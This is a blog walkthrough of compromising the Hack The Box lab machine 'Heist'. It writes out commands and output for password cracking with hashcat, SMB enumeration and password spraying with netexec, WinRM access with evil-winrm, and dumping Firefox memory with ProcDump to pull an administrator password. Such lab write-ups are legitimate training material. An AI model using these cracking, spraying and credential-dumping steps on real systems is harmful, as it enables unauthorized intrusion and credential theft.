This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.
You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.
Hola Gente!
Today we are going to go over the steps I followed to get root on Heist, a machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.
Scanning and Enumeration
I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:
TGT=10.129.96.157
nmap -sSVC -n -oA nmap $TGT
Key findings:
Port 80: HTTP running Microsoft IIS 10.0.
Port 135: MSRPC.
Port 445: Microsoft SMB service.
Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest:
Logging in provided access to download a Cisco configuration file containing encrypted passwords.
Extract of the config File:
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Decrypting Passwords
The configuration file included encrypted credentials:
User
rout3r
: Cisco Type 7 password.enable secret
: Cisco Type 5 hash.
Using an online Cisco Type 7 decryption tool and hashcat
with the rockyou wordlist, I cracked the credentials:
hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O
rout3r
:$uperP@ssword
Admin password:
Q4)sJu\Y8qz*A3?d
Enable secret:
stealth1agent
SMB Enumeration
Armed with the credentials, I tested SMB access using netexec
:
netexec smb $TGT -u hazard -p stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
And then tried to do a little more enumeration with netexc
and smbmap
netexec smb $TGT -u hazard -p stealth1agent --shares
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Enumerated shares
SMB 10.129.96.157 445 SUPPORTDESK Share Permissions Remark
SMB 10.129.96.157 445 SUPPORTDESK ----- ----------- ------
SMB 10.129.96.157 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.129.96.157 445 SUPPORTDESK C$ Default share
SMB 10.129.96.157 445 SUPPORTDESK IPC$ READ Remote IPC
smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.96.157:445 Name: 10.129.96.157 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I enumerated shares, noting accessible resources and potential avenues for lateral movement. A brute-force RID enumeration revealed several user accounts, including:
Administrator
Guest
Hazard
Chase
netexec smb $TGT -u hazard -p stealth1agent --rid-brute
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
I created a users.txt
and passwords.txt
file and ran a password spray using netexec
:
netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success
And Success! I found valid credentials for user Chase
:
Username:
Chase
Password:
Q4)sJu\Y8qz*A3?d
With valid credentials, I confirmed remote access using netexec winrm
:
netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig"
This granted me WinRM access, allowing me to execute commands on the target.
Exploitation
Using evil-winrm
, I gained an interactive shell and extracted the user flag from the desktop:
evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
Navigating through the user Desktop, I found and captured the flag. 🎉
Privilege Escalation
After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file:
PS C:\Users\Chase\Desktop>type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
After a quick run with winPEAS I noticed that there was a Firefox Creds DB file accessible.
I tried downloading which took me a while because I kept on trying and kept on getting a 0 bytes file. It turned out that I had to kill the Firefox process before attempting to download. I was finally able to download it.
I started trying to crack it, but I had a hard time finding some missing files that were required to crack the credentials.
It eventually turned out to be a 4 hour rabbit hole as this wasn't the way to escalate privileges.
Well, back to square one. From Chase's To-Do list he was supposed to check the current issues. Looking at the current processes the only thing that stood out is Firefox. There's a good chance he is the one that’s using it.
Disclaimer: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory.
Once I realized this was a potential avenue and learned about ProcDump.exe I uploaded and used it to dump Firefox’s Memory:
*Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1063 63 112688 201964 2.52 6440 1 firefox
*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command
*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command
I downloaded the firefox.dmp to my attacker machine (after several tries since they all kept timing out) for further investigation. The dump was was almost 50 MB. At this point I didn’t know what I was looking for.
Going back to the /login.php page, I checked with Burp Proxy request/response HTTP messages for a login attempt:
And noticed that the request parameter “login_password” was being passed as a POST parameter.
I then used strings and grep to look for this particular string:
strings -el firefox.dmp | grep login_password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
These credentials—admin@support.htb
and 4dD!5}x/re8]FBuZ
—looked promising!
Armed with the newly discovered credentials, I tested them for WinRM access as the Administrator:
netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM 10.129.96.157 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM 10.129.96.157 5985 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
And it worked!
And then got a Shell and a Root Flag with Evil-WinRM
evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
Lessons Learned
Read and analyze all clues carefully (e.g.,
todo.txt
).Use
get-process
to identify active processes for exploitation.Memory dumps often reveal sensitive data (e.g., credentials).
Avoid rabbit holes (DAH!); reassess your strategy if you get stuck
Evil-WinRM
andNetexec
are your friends
Call to Action!
Thanks for making it this far, If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my referral link. Trust me—you'll get hooked! 😊 Until next time!